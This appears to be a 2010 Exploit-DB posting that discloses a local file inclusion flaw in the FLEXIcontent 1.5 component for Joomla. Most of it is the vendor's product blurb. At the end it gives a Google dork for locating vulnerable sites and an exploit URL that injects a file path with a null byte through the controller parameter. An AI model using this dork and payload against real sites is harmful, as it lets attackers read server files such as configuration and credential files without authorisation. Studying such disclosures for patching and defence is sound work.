Joomla! Component FLEXIcontent 1.5 - Local File Inclusion

EDB-ID:

12185

CVE:

N/A


Platform:

PHP

Published:

2010-04-12

##################################################################
Joomla Component com_flexicontent Local File Vulnerability
##################################################################
 
[+]Title:	Joomla Component Local File Inclusion Vulnerability
[+]Version:	com_flexicontent (FLEXIcontent 1.5 stable)
[+]Download:    http://www.flexicontent.org/downloads/latest-version.html
[+]Author:  eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com    
 
    [!]Thank`s To: JosS , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db team & all friends
 
########################################################
Description:

FLEXIcontent is primarily an advanced content management system developed to replace the native article manager of Joomla! 1.5 (com_content)

It adds the professional features required to build a collaborative web publishing system. Even if it’s not its primary purpose, it can also manage records by presenting them the way of a directory.

Thus, FLEXIcontent was designed to manage content in a broad sense, and can organise articles, image or video galleries, job offers, product catalogues, business directories, a.s.o. within a single user interface.

This means for the end user, unparalleled simplicity of use, everything happens in one place. Mastering 10 components to be able to administrate an entire website isn’t required anymore. For the web designer it means also the end of the headaches for the maintenance and updates of all installed extensions.

FLEXIcontent is an extension for Joomla! developed in 1.5 native mode and complying with the naming and coding conventions of the Framework (MVC frontend and backend). Thus, its portability to future versions will be greatly facilitated. 
########################################################

	-=[Unique Dork => inurl:index.php/option?com_flexicontent]=-
    
 
    -=[ Exploit ]=-

	http://127.0.0.1/index.php?option=com_flexicontent&controller= [lfi]%00
 
####################=[E0F]=####################


								
															[D]eal [C]yber 04/12/2010 GMT+7